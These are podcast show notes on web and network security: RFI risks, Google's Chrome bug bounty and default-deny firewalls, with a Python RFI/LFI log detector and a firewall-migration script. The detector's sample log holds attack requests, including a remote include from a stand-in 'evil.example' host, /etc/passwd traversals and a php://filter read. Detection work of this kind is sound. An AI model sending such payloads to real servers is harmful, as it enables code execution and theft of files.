
Tenable Network Security Podcast - Episode 21

Welcome to the Tenable Network Security Podcast - Episode 21

Announcements


Interview: Ron Gula - Security Center Version 4

Tenable CEO Ron Gula and I discuss the features of Security Center and some of the recent enhancements being made in the new version 4.0.

Stories

  • Holy RFI Batman! - Rsnake has published a list of web applications that are allowing an RFI attack to occur. This attack vector allows the bad guys to potentially run code on the remote server and on clients visiting the site. These attacks can also lead to Local File Inclusion, allowing attackers to read files on the remote host. I've also found a list of remote file inclusion vulnerabilities that were harvested from the OSVDB. This is a common attack vector used by attackers to drop malicious JavaScript code into web sites.
  • Google Willing to Pay For Bugs In Chrome - Google has announced that they will pay up to $1,337 for bugs that are found in the Chrome browser and $500 for lower-severity bugs. You can look at this two ways. First, my inclination is to state that Google is a large enough company that they should be implementing secure coding practices and have a team dedicated to the security of Chrome. It is likely they have this; however, on the flip side, giving incentive to millions of people to find bugs is something Google could not do on their own. So, they offer a reward for bugs to harness the power of the Internet community to make their software better. The problem is twofold: if you are a "whitehat" hacker, you can make more money selling it to other organizations, or stand up to a moral code and provide Google the details without asking for anything in return. Regardless of where you stand on that issue, Google's bounty for vulnerabilities is not in tune with reality. The other factor is that if a "blackhat" hacker were to find a bug, they may decide to keep it for themselves and use it to compromise systems and make money through a botnet or pop-up ads. They may also decide to sell it on the black market to other "blackhats".
  • Network Security Fundamentals - Default Deny - Ah yes, the wonders of firewall administration and "default deny". I remember it vividly during my time (an extended period of time, mind you) as a firewall administrator. Many subnets within the organization were implementing the reverse of "default deny": "default accept", blocking only the exceptions. This was a bad place to be, because going to a "default deny" in this situation would almost certainly break things and lead to cranky users. It was a long process of analyzing traffic to see what needed to be allowed and adding rules. Was it worth it? Maybe; over time my opinion of firewalls is changing. I'm still in favor of using firewalls, but in many situations I believe more effort should be placed on system hardening. This includes using the principle of least privilege, applying software updates, turning off unnecessary services, and tuning the configuration to be "secure" (as in enabling the security features). Let's face it, the firewall only blocks a certain class of attacks, which is important, but let's not forget about security completely because we have a firewall. I like to extend "default deny" to other aspects of security, such as system hardening (why do we have so-called "default" passwords!), and host intrusion prevention client software (why do we allow DLL injections and embedded iFrames?).
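The RFI/LFI story above is easiest to act on from the web server's own access logs, where an `include`-style parameter carrying a remote URL, a PHP stream wrapper, or a `../` traversal stands out. The following detector is an added example written for these show notes, not code from Tenable or from the podcast; the log lines are constructed, and the parameter names and scheme lists are assumptions, not taken from Rsnake's or OSVDB's lists.

```python
"""Flag web requests whose query parameters look like remote file inclusion
(RFI), PHP stream-wrapper abuse, or local file inclusion (LFI) attempts.
Added example for the show notes; the log lines below are constructed."""
import re
from typing import List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in combined access-log format (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2010:10:01:12 -0500] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [10/Feb/2010:10:01:40 -0500] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 77
10.0.0.9 - - [10/Feb/2010:10:02:03 -0500] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1302
10.0.0.9 - - [10/Feb/2010:10:02:15 -0500] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1302
10.0.0.9 - - [10/Feb/2010:10:02:30 -0500] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 900
10.0.0.7 - - [10/Feb/2010:10:03:00 -0500] "GET /news.php?id=42 HTTP/1.1" 200 2048
"""

# Parses client IP, timestamp, method, request target and status from one line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)

# Schemes PHP's include()/require() would fetch over the network (RFI) ...
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
# ... and stream wrappers commonly abused to read local files or run code.
WRAPPER_SCHEMES = {"php", "data", "expect", "zip", "phar", "file"}


def classify_value(value: str) -> Optional[str]:
    """Return 'RFI', 'WRAPPER', 'LFI' or None for one parameter value."""
    # parse_qsl has already URL-decoded once; decoding again catches
    # double-encoded payloads such as %252e%252e%252f.
    decoded = unquote(value)
    m = SCHEME_RE.match(decoded)
    if m:
        scheme = m.group(1).lower()
        if scheme in REMOTE_SCHEMES:
            return "RFI"
        if scheme in WRAPPER_SCHEMES:
            return "WRAPPER"
    # Directory traversal or a NUL byte used to truncate an appended extension.
    if "../" in decoded or "..\\" in decoded or "\x00" in decoded:
        return "LFI"
    return None


def scan_log(text: str) -> List[dict]:
    """Return one finding per suspicious query parameter in the log text."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "param": name,
                    "kind": kind, "value": unquote(value),
                    "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        # A 200 on a traversal or wrapper request deserves a closer look
        # than a 404: the include may actually have succeeded.
        print(f"{f['ip']} {f['kind']:8} {f['param']}={f['value']!r} -> {f['status']}")
```

The status code is kept in each finding on purpose: a traversal request that returned 200 with a body the size of `/etc/passwd` is a different priority from one that 404'd, and that is the first thing to check when triaging the output.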

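The "default deny" story describes a migration: analyze the traffic that is actually flowing, derive the allow rules it needs, and find out in advance which flows the switch would break. The following script models that process. It is an added example written for these show notes, not code from Tenable or from the podcast; the flow records, the rule model and the `min_count` threshold are constructed assumptions, not a real firewall's configuration.

```python
"""Derive the allow rules a default-deny policy would need from observed
flows, and list the flows that pass today under default-accept but would be
dropped after the switch.  Added example; all flow records are constructed."""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str   # "tcp" or "udp"
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    dst_net: str           # CIDR the rule applies to
    proto: str             # "tcp", "udp" or "any"
    dport: Optional[int]   # None matches any port

    def matches(self, flow: Flow) -> bool:
        return (ip_address(flow.dst) in ip_network(self.dst_net)
                and self.proto in ("any", flow.proto)
                and self.dport in (None, flow.dport))


def evaluate(rules: List[Rule], default_action: str, flow: Flow) -> str:
    """First-match rule evaluation; the default applies when nothing matches."""
    for rule in rules:
        if rule.matches(flow):
            return rule.action
    return default_action


# Constructed sample of observed flows from a client subnet to a server subnet.
SAMPLE_FLOWS = [
    Flow("10.1.0.12", "10.2.0.5", "tcp", 443),
    Flow("10.1.0.12", "10.2.0.5", "tcp", 443),
    Flow("10.1.0.20", "10.2.0.5", "tcp", 443),
    Flow("10.1.0.20", "10.2.0.6", "tcp", 22),
    Flow("10.1.0.33", "10.2.0.9", "udp", 53),
    Flow("10.1.0.33", "10.2.0.9", "udp", 53),
    Flow("10.1.0.40", "10.2.0.6", "tcp", 23),   # telnet: the one known exception
    Flow("10.1.0.40", "10.2.0.7", "tcp", 445),
]

# The "default accept, block only the exceptions" posture from the show notes.
DEFAULT_ACCEPT_RULES = [Rule("deny", "10.2.0.0/24", "tcp", 23)]


def derive_allow_rules(flows: List[Flow], current_rules: List[Rule],
                       min_count: int = 1) -> List[Rule]:
    """One host-specific allow rule per (dst, proto, dport) service that the
    current policy permits and that was seen at least min_count times.
    Existing deny exceptions are honoured so they do not become allows."""
    permitted = [f for f in flows if evaluate(current_rules, "allow", f) == "allow"]
    seen = Counter((f.dst, f.proto, f.dport) for f in permitted)
    return [Rule("allow", f"{dst}/32", proto, dport)
            for (dst, proto, dport), n in sorted(seen.items()) if n >= min_count]


def migration_report(flows: List[Flow], current_rules: List[Rule],
                     min_count: int = 1) -> Tuple[List[Rule], List[Flow]]:
    """Return (proposed allow rules, flows that would break after the switch).
    A flow 'breaks' if it is allowed today but denied under default deny."""
    new_rules = derive_allow_rules(flows, current_rules, min_count)
    would_break = [f for f in flows
                   if evaluate(current_rules, "allow", f) == "allow"
                   and evaluate(new_rules, "deny", f) == "deny"]
    return new_rules, would_break


if __name__ == "__main__":
    # Requiring a service to be seen twice drops one-off flows from the
    # allow list; the report shows who would complain before it happens.
    rules, broken = migration_report(SAMPLE_FLOWS, DEFAULT_ACCEPT_RULES, min_count=2)
    for r in rules:
        print(f"allow {r.proto}/{r.dport} to {r.dst_net}")
    for f in broken:
        print(f"would break: {f.src} -> {f.dst} {f.proto}/{f.dport}")
```

Raising `min_count` is where the trade-off the story describes shows up: the higher the threshold, the shorter the allow list and the longer the list of one-off flows (here the single SSH and SMB connections) that someone has to confirm as legitimate before the switch, which is exactly the traffic analysis the post calls a long process.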